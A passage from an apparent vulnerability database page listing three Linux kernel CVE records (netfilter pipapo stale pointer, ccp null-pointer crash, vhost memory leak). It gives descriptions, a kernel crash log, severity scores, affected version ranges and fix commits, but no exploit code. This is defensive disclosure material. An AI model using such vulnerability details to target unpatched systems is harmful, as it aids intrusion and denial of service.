function must not ever be called with an invisible/unreachable/non-existent
element.
v2: avoid uneeded temporary variable (Stefano)
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3c4287f62044a90e73a561aa05fc46e62da173da Version: 3c4287f62044a90e73a561aa05fc46e62da173da Version: 3c4287f62044a90e73a561aa05fc46e62da173da Version: 3c4287f62044a90e73a561aa05fc46e62da173da Version: 3c4287f62044a90e73a561aa05fc46e62da173da Version: 3c4287f62044a90e73a561aa05fc46e62da173da |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.6:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.6"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "3c4287f62044"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26924",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-29T16:46:54.309255Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:06.077Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:14:47.716Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3b887a9c11caf8357a821260e095f2a694a34f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a1679e2d9bfa3b5f8755c2c7113e54b7d42bd46"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41d8fdf3afaff312e17466e4ab732937738d5644"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ebf7c9746f073035ee26209e38c3a1170f7b349a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14b001ba221136c15f894577253e8db535b99487"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cfc9ec039af60dbd8965ae085b2c2ccdcfbe1cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_set_pipapo.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e3b887a9c11caf8357a821260e095f2a694a34f2",
"status": "affected",
"version": "3c4287f62044a90e73a561aa05fc46e62da173da",
"versionType": "git"
},
{
"lessThan": "7a1679e2d9bfa3b5f8755c2c7113e54b7d42bd46",
"status": "affected",
"version": "3c4287f62044a90e73a561aa05fc46e62da173da",
"versionType": "git"
},
{
"lessThan": "41d8fdf3afaff312e17466e4ab732937738d5644",
"status": "affected",
"version": "3c4287f62044a90e73a561aa05fc46e62da173da",
"versionType": "git"
},
{
"lessThan": "ebf7c9746f073035ee26209e38c3a1170f7b349a",
"status": "affected",
"version": "3c4287f62044a90e73a561aa05fc46e62da173da",
"versionType": "git"
},
{
"lessThan": "14b001ba221136c15f894577253e8db535b99487",
"status": "affected",
"version": "3c4287f62044a90e73a561aa05fc46e62da173da",
"versionType": "git"
},
{
"lessThan": "3cfc9ec039af60dbd8965ae085b2c2ccdcfbe1cc",
"status": "affected",
"version": "3c4287f62044a90e73a561aa05fc46e62da173da",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_set_pipapo.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_pipapo: do not free live element\n\nPablo reports a crash with large batches of elements with a\nback-to-back add/remove pattern. Quoting Pablo:\n\n add_elem(\"00000000\") timeout 100 ms\n ...\n add_elem(\"0000000X\") timeout 100 ms\n del_elem(\"0000000X\") \u003c---------------- delete one that was just added\n ...\n add_elem(\"00005000\") timeout 100 ms\n\n 1) nft_pipapo_remove() removes element 0000000X\n Then, KASAN shows a splat.\n\nLooking at the remove function there is a chance that we will drop a\nrule that maps to a non-deactivated element.\n\nRemoval happens in two steps, first we do a lookup for key k and return the\nto-be-removed element and mark it as inactive in the next generation.\nThen, in a second step, the element gets removed from the set/map.\n\nThe _remove function does not work correctly if we have more than one\nelement that share the same key.\n\nThis can happen if we insert an element into a set when the set already\nholds an element with same key, but the element mapping to the existing\nkey has timed out or is not active in the next generation.\n\nIn such case its possible that removal will unmap the wrong element.\nIf this happens, we will leak the non-deactivated element, it becomes\nunreachable.\n\nThe element that got deactivated (and will be freed later) will\nremain reachable in the set data structure, this can result in\na crash when such an element is retrieved during lookup (stale\npointer).\n\nAdd a check that the fully matching key does in fact map to the element\nthat we have marked as inactive in the deactivation step.\nIf not, we need to continue searching.\n\nAdd a bug/warn trap at the end of the function as well, the remove\nfunction must not ever be called with an invisible/unreachable/non-existent\nelement.\n\nv2: avoid uneeded temporary variable (Stefano)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:49.595Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e3b887a9c11caf8357a821260e095f2a694a34f2"
},
{
"url": "https://git.kernel.org/stable/c/7a1679e2d9bfa3b5f8755c2c7113e54b7d42bd46"
},
{
"url": "https://git.kernel.org/stable/c/41d8fdf3afaff312e17466e4ab732937738d5644"
},
{
"url": "https://git.kernel.org/stable/c/ebf7c9746f073035ee26209e38c3a1170f7b349a"
},
{
"url": "https://git.kernel.org/stable/c/14b001ba221136c15f894577253e8db535b99487"
},
{
"url": "https://git.kernel.org/stable/c/3cfc9ec039af60dbd8965ae085b2c2ccdcfbe1cc"
}
],
"title": "netfilter: nft_set_pipapo: do not free live element",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26924",
"datePublished": "2024-04-24T21:49:22.631Z",
"dateReserved": "2024-02-19T14:20:24.194Z",
"dateUpdated": "2025-11-04T17:14:47.716Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26695 (GCVE-0-2024-26695)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: ccp - Fix null pointer dereference in __sev_platform_shutdown_locked
The SEV platform device can be shutdown with a null psp_master,
e.g., using DEBUG_TEST_DRIVER_REMOVE. Found using KASAN:
[ 137.148210] ccp 0000:23:00.1: enabling device (0000 -> 0002)
[ 137.162647] ccp 0000:23:00.1: no command queues available
[ 137.170598] ccp 0000:23:00.1: sev enabled
[ 137.174645] ccp 0000:23:00.1: psp enabled
[ 137.178890] general protection fault, probably for non-canonical address 0xdffffc000000001e: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN NOPTI
[ 137.182693] KASAN: null-ptr-deref in range [0x00000000000000f0-0x00000000000000f7]
[ 137.182693] CPU: 93 PID: 1 Comm: swapper/0 Not tainted 6.8.0-rc1+ #311
[ 137.182693] RIP: 0010:__sev_platform_shutdown_locked+0x51/0x180
[ 137.182693] Code: 08 80 3c 08 00 0f 85 0e 01 00 00 48 8b 1d 67 b6 01 08 48 b8 00 00 00 00 00 fc ff df 48 8d bb f0 00 00 00 48 89 f9 48 c1 e9 03 <80> 3c 01 00 0f 85 fe 00 00 00 48 8b 9b f0 00 00 00 48 85 db 74 2c
[ 137.182693] RSP: 0018:ffffc900000cf9b0 EFLAGS: 00010216
[ 137.182693] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 000000000000001e
[ 137.182693] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 00000000000000f0
[ 137.182693] RBP: ffffc900000cf9c8 R08: 0000000000000000 R09: fffffbfff58f5a66
[ 137.182693] R10: ffffc900000cf9c8 R11: ffffffffac7ad32f R12: ffff8881e5052c28
[ 137.182693] R13: ffff8881e5052c28 R14: ffff8881758e43e8 R15: ffffffffac64abf8
[ 137.182693] FS: 0000000000000000(0000) GS:ffff889de7000000(0000) knlGS:0000000000000000
[ 137.182693] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 137.182693] CR2: 0000000000000000 CR3: 0000001cf7c7e000 CR4: 0000000000350ef0
[ 137.182693] Call Trace:
[ 137.182693] <TASK>
[ 137.182693] ? show_regs+0x6c/0x80
[ 137.182693] ? __die_body+0x24/0x70
[ 137.182693] ? die_addr+0x4b/0x80
[ 137.182693] ? exc_general_protection+0x126/0x230
[ 137.182693] ? asm_exc_general_protection+0x2b/0x30
[ 137.182693] ? __sev_platform_shutdown_locked+0x51/0x180
[ 137.182693] sev_firmware_shutdown.isra.0+0x1e/0x80
[ 137.182693] sev_dev_destroy+0x49/0x100
[ 137.182693] psp_dev_destroy+0x47/0xb0
[ 137.182693] sp_destroy+0xbb/0x240
[ 137.182693] sp_pci_remove+0x45/0x60
[ 137.182693] pci_device_remove+0xaa/0x1d0
[ 137.182693] device_remove+0xc7/0x170
[ 137.182693] really_probe+0x374/0xbe0
[ 137.182693] ? srso_return_thunk+0x5/0x5f
[ 137.182693] __driver_probe_device+0x199/0x460
[ 137.182693] driver_probe_device+0x4e/0xd0
[ 137.182693] __driver_attach+0x191/0x3d0
[ 137.182693] ? __pfx___driver_attach+0x10/0x10
[ 137.182693] bus_for_each_dev+0x100/0x190
[ 137.182693] ? __pfx_bus_for_each_dev+0x10/0x10
[ 137.182693] ? __kasan_check_read+0x15/0x20
[ 137.182693] ? srso_return_thunk+0x5/0x5f
[ 137.182693] ? _raw_spin_unlock+0x27/0x50
[ 137.182693] driver_attach+0x41/0x60
[ 137.182693] bus_add_driver+0x2a8/0x580
[ 137.182693] driver_register+0x141/0x480
[ 137.182693] __pci_register_driver+0x1d6/0x2a0
[ 137.182693] ? srso_return_thunk+0x5/0x5f
[ 137.182693] ? esrt_sysfs_init+0x1cd/0x5d0
[ 137.182693] ? __pfx_sp_mod_init+0x10/0x10
[ 137.182693] sp_pci_init+0x22/0x30
[ 137.182693] sp_mod_init+0x14/0x30
[ 137.182693] ? __pfx_sp_mod_init+0x10/0x10
[ 137.182693] do_one_initcall+0xd1/0x470
[ 137.182693] ? __pfx_do_one_initcall+0x10/0x10
[ 137.182693] ? parameq+0x80/0xf0
[ 137.182693] ? srso_return_thunk+0x5/0x5f
[ 137.182693] ? __kmalloc+0x3b0/0x4e0
[ 137.182693] ? kernel_init_freeable+0x92d/0x1050
[ 137.182693] ? kasan_populate_vmalloc_pte+0x171/0x190
[ 137.182693] ? srso_return_thunk+0x5/0x5f
[ 137.182693] kernel_init_freeable+0xa64/0x1050
[ 137.182693] ? __pfx_kernel_init+0x10/0x10
[ 137.182693] kernel_init+0x24/0x160
[ 137.182693] ? __switch_to_asm+0x3e/0x70
[ 137.182693] ret_from_fork+0x40/0x80
[ 137.182693] ? __pfx_kernel_init+0x1
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 87af9b0b45666ca3dd6b10c0ece691c740b0f750 Version: f831d2882c843d44100016aeb4332e9c4b560805 Version: 1b05ece0c931536c0a38a9385e243a7962e933f6 Version: 1b05ece0c931536c0a38a9385e243a7962e933f6 Version: 1b05ece0c931536c0a38a9385e243a7962e933f6 Version: 1b05ece0c931536c0a38a9385e243a7962e933f6 Version: fcb04178c05b88a98921e262da9f7cb21cfff118 Version: d87bbd10fc01b52c814113643f2707d2d10b0319 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.671Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58054faf3bd29cd0b949b77efcb6157f66f401ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7535ec350a5f09b5756a7607f5582913f21200f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8731fe001a60581794ed9cf65da8cd304846a6fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/88aa493f393d2ee38ac140e1f6ac1881346e85d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b5909f197f3b26aebedca7d8ac7b688fd993a266"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ccb88e9549e7cfd8bcd511c538f437e20026e983"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26695",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:52:57.346229Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:55.424Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/crypto/ccp/sev-dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "58054faf3bd29cd0b949b77efcb6157f66f401ed",
"status": "affected",
"version": "87af9b0b45666ca3dd6b10c0ece691c740b0f750",
"versionType": "git"
},
{
"lessThan": "7535ec350a5f09b5756a7607f5582913f21200f4",
"status": "affected",
"version": "f831d2882c843d44100016aeb4332e9c4b560805",
"versionType": "git"
},
{
"lessThan": "8731fe001a60581794ed9cf65da8cd304846a6fb",
"status": "affected",
"version": "1b05ece0c931536c0a38a9385e243a7962e933f6",
"versionType": "git"
},
{
"lessThan": "88aa493f393d2ee38ac140e1f6ac1881346e85d4",
"status": "affected",
"version": "1b05ece0c931536c0a38a9385e243a7962e933f6",
"versionType": "git"
},
{
"lessThan": "b5909f197f3b26aebedca7d8ac7b688fd993a266",
"status": "affected",
"version": "1b05ece0c931536c0a38a9385e243a7962e933f6",
"versionType": "git"
},
{
"lessThan": "ccb88e9549e7cfd8bcd511c538f437e20026e983",
"status": "affected",
"version": "1b05ece0c931536c0a38a9385e243a7962e933f6",
"versionType": "git"
},
{
"status": "affected",
"version": "fcb04178c05b88a98921e262da9f7cb21cfff118",
"versionType": "git"
},
{
"status": "affected",
"version": "d87bbd10fc01b52c814113643f2707d2d10b0319",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/crypto/ccp/sev-dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10.137",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.15.61",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.18.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.19.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: ccp - Fix null pointer dereference in __sev_platform_shutdown_locked\n\nThe SEV platform device can be shutdown with a null psp_master,\ne.g., using DEBUG_TEST_DRIVER_REMOVE. Found using KASAN:\n\n[ 137.148210] ccp 0000:23:00.1: enabling device (0000 -\u003e 0002)\n[ 137.162647] ccp 0000:23:00.1: no command queues available\n[ 137.170598] ccp 0000:23:00.1: sev enabled\n[ 137.174645] ccp 0000:23:00.1: psp enabled\n[ 137.178890] general protection fault, probably for non-canonical address 0xdffffc000000001e: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN NOPTI\n[ 137.182693] KASAN: null-ptr-deref in range [0x00000000000000f0-0x00000000000000f7]\n[ 137.182693] CPU: 93 PID: 1 Comm: swapper/0 Not tainted 6.8.0-rc1+ #311\n[ 137.182693] RIP: 0010:__sev_platform_shutdown_locked+0x51/0x180\n[ 137.182693] Code: 08 80 3c 08 00 0f 85 0e 01 00 00 48 8b 1d 67 b6 01 08 48 b8 00 00 00 00 00 fc ff df 48 8d bb f0 00 00 00 48 89 f9 48 c1 e9 03 \u003c80\u003e 3c 01 00 0f 85 fe 00 00 00 48 8b 9b f0 00 00 00 48 85 db 74 2c\n[ 137.182693] RSP: 0018:ffffc900000cf9b0 EFLAGS: 00010216\n[ 137.182693] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 000000000000001e\n[ 137.182693] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 00000000000000f0\n[ 137.182693] RBP: ffffc900000cf9c8 R08: 0000000000000000 R09: fffffbfff58f5a66\n[ 137.182693] R10: ffffc900000cf9c8 R11: ffffffffac7ad32f R12: ffff8881e5052c28\n[ 137.182693] R13: ffff8881e5052c28 R14: ffff8881758e43e8 R15: ffffffffac64abf8\n[ 137.182693] FS: 0000000000000000(0000) GS:ffff889de7000000(0000) knlGS:0000000000000000\n[ 137.182693] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 137.182693] CR2: 0000000000000000 CR3: 0000001cf7c7e000 CR4: 0000000000350ef0\n[ 137.182693] Call Trace:\n[ 137.182693] \u003cTASK\u003e\n[ 137.182693] ? show_regs+0x6c/0x80\n[ 137.182693] ? __die_body+0x24/0x70\n[ 137.182693] ? die_addr+0x4b/0x80\n[ 137.182693] ? exc_general_protection+0x126/0x230\n[ 137.182693] ? asm_exc_general_protection+0x2b/0x30\n[ 137.182693] ? __sev_platform_shutdown_locked+0x51/0x180\n[ 137.182693] sev_firmware_shutdown.isra.0+0x1e/0x80\n[ 137.182693] sev_dev_destroy+0x49/0x100\n[ 137.182693] psp_dev_destroy+0x47/0xb0\n[ 137.182693] sp_destroy+0xbb/0x240\n[ 137.182693] sp_pci_remove+0x45/0x60\n[ 137.182693] pci_device_remove+0xaa/0x1d0\n[ 137.182693] device_remove+0xc7/0x170\n[ 137.182693] really_probe+0x374/0xbe0\n[ 137.182693] ? srso_return_thunk+0x5/0x5f\n[ 137.182693] __driver_probe_device+0x199/0x460\n[ 137.182693] driver_probe_device+0x4e/0xd0\n[ 137.182693] __driver_attach+0x191/0x3d0\n[ 137.182693] ? __pfx___driver_attach+0x10/0x10\n[ 137.182693] bus_for_each_dev+0x100/0x190\n[ 137.182693] ? __pfx_bus_for_each_dev+0x10/0x10\n[ 137.182693] ? __kasan_check_read+0x15/0x20\n[ 137.182693] ? srso_return_thunk+0x5/0x5f\n[ 137.182693] ? _raw_spin_unlock+0x27/0x50\n[ 137.182693] driver_attach+0x41/0x60\n[ 137.182693] bus_add_driver+0x2a8/0x580\n[ 137.182693] driver_register+0x141/0x480\n[ 137.182693] __pci_register_driver+0x1d6/0x2a0\n[ 137.182693] ? srso_return_thunk+0x5/0x5f\n[ 137.182693] ? esrt_sysfs_init+0x1cd/0x5d0\n[ 137.182693] ? __pfx_sp_mod_init+0x10/0x10\n[ 137.182693] sp_pci_init+0x22/0x30\n[ 137.182693] sp_mod_init+0x14/0x30\n[ 137.182693] ? __pfx_sp_mod_init+0x10/0x10\n[ 137.182693] do_one_initcall+0xd1/0x470\n[ 137.182693] ? __pfx_do_one_initcall+0x10/0x10\n[ 137.182693] ? parameq+0x80/0xf0\n[ 137.182693] ? srso_return_thunk+0x5/0x5f\n[ 137.182693] ? __kmalloc+0x3b0/0x4e0\n[ 137.182693] ? kernel_init_freeable+0x92d/0x1050\n[ 137.182693] ? kasan_populate_vmalloc_pte+0x171/0x190\n[ 137.182693] ? srso_return_thunk+0x5/0x5f\n[ 137.182693] kernel_init_freeable+0xa64/0x1050\n[ 137.182693] ? __pfx_kernel_init+0x10/0x10\n[ 137.182693] kernel_init+0x24/0x160\n[ 137.182693] ? __switch_to_asm+0x3e/0x70\n[ 137.182693] ret_from_fork+0x40/0x80\n[ 137.182693] ? __pfx_kernel_init+0x1\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:27.642Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/58054faf3bd29cd0b949b77efcb6157f66f401ed"
},
{
"url": "https://git.kernel.org/stable/c/7535ec350a5f09b5756a7607f5582913f21200f4"
},
{
"url": "https://git.kernel.org/stable/c/8731fe001a60581794ed9cf65da8cd304846a6fb"
},
{
"url": "https://git.kernel.org/stable/c/88aa493f393d2ee38ac140e1f6ac1881346e85d4"
},
{
"url": "https://git.kernel.org/stable/c/b5909f197f3b26aebedca7d8ac7b688fd993a266"
},
{
"url": "https://git.kernel.org/stable/c/ccb88e9549e7cfd8bcd511c538f437e20026e983"
}
],
"title": "crypto: ccp - Fix null pointer dereference in __sev_platform_shutdown_locked",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26695",
"datePublished": "2024-04-03T14:54:56.184Z",
"dateReserved": "2024-02-19T14:20:24.156Z",
"dateUpdated": "2025-05-04T12:54:27.642Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-0340 (GCVE-0-2024-0340)
Vulnerability from cvelistv5
Published
2024-01-09 17:36
Modified
2025-11-07 17:06
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Summary
A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Version: 0 ≤ |
|||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:04:49.242Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:3618",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3618"
},
{
"name": "RHSA-2024:3627",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3627"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0340"
},
{
"name": "RHBZ#2257406",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257406"
},
{
"tags": [
"x_transferred"
],
